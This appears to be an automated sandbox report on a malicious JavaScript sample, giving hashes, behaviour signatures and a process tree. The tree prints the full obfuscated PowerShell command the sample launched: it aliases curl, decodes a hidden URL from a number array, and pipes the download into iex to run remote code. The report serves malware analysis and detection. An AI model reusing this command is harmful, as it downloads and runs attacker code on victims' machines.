Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-12-2024 15:16
Static task
static1
Behavioral task
behavioral1
Sample
b2cb5fd78c50017d446ce5a874500706c474156d5650b37d2738996306dfa388.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
b2cb5fd78c50017d446ce5a874500706c474156d5650b37d2738996306dfa388.js
Resource
win10v2004-20241007-en
General
-
Target
b2cb5fd78c50017d446ce5a874500706c474156d5650b37d2738996306dfa388.js
-
Size
190KB
-
MD5
e6f409613ab68ae30633627f0c13aea1
-
SHA1
8b61a6def998e62ca7565712d69164f005e16deb
-
SHA256
b2cb5fd78c50017d446ce5a874500706c474156d5650b37d2738996306dfa388
-
SHA512
7a061bd694c7010f5bb4335fb4ad164c5aa4259bccdc4bdb7f1a10674df5b22f452e93b6f76df0e769793445c5238248f8c1f6e40981f5e1ed04b6ccc3c9e324
-
SSDEEP
1536:nw4203+M1CubRFvgxAyJ/qCcooBY1UD+M1CubRFvgxAyJ/QCcooBY1UwCcooBY1e:nFh+rP/1wh+rl/1G/19h+rdh+r2
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4024 4408 conhost.exe 83 -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 3516 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3516 powershell.exe 3516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3516 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4024 wrote to memory of 3516 4024 conhost.exe 85 PID 4024 wrote to memory of 3516 4024 conhost.exe 85
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\b2cb5fd78c50017d446ce5a874500706c474156d5650b37d2738996306dfa388.js1⤵PID:1288
-
C:\Windows\system32\conhost.execonhost --headless powershell $fcbmzp='ur' ;new-alias printout c$($fcbmzp)l;$uaghemjrdnfsp=(2628,2639,2647,2631,2633,2628,2648,2647,2652,2585,2647,2581,2628,2576,2646,2641,2642,2577,2579,2576,2642,2634,2642,2593,2645,2591,2639,2635,2640,2646,2645,2580,2579);$gzkcfu=('bronx','get-cmdlet');$qmzfbdsyo=$uaghemjrdnfsp;foreach($qkedmjfyv in $qmzfbdsyo){$pfoalvmqtywx=$qkedmjfyv;$xqbpmdjlsarfk=$xqbpmdjlsarfk+[char]($pfoalvmqtywx-2530);$atikshxvuynwgr=$xqbpmdjlsarfk; $amowtecvxkp=$atikshxvuynwgr};$hycibqzspnv[2]=$amowtecvxkp;$aozswpmkvjgcy='rl';$olpiarnjkfub=1;.$([char](9992-9887)+'e'+'x')(printout -useb $amowtecvxkp)1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $fcbmzp='ur' ;new-alias printout c$($fcbmzp)l;$uaghemjrdnfsp=(2628,2639,2647,2631,2633,2628,2648,2647,2652,2585,2647,2581,2628,2576,2646,2641,2642,2577,2579,2576,2642,2634,2642,2593,2645,2591,2639,2635,2640,2646,2645,2580,2579);$gzkcfu=('bronx','get-cmdlet');$qmzfbdsyo=$uaghemjrdnfsp;foreach($qkedmjfyv in $qmzfbdsyo){$pfoalvmqtywx=$qkedmjfyv;$xqbpmdjlsarfk=$xqbpmdjlsarfk+[char]($pfoalvmqtywx-2530);$atikshxvuynwgr=$xqbpmdjlsarfk; $amowtecvxkp=$atikshxvuynwgr};$hycibqzspnv[2]=$amowtecvxkp;$aozswpmkvjgcy='rl';$olpiarnjkfub=1;.$([char](9992-9887)+'e'+'x')(printout -useb $amowtecvxkp)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82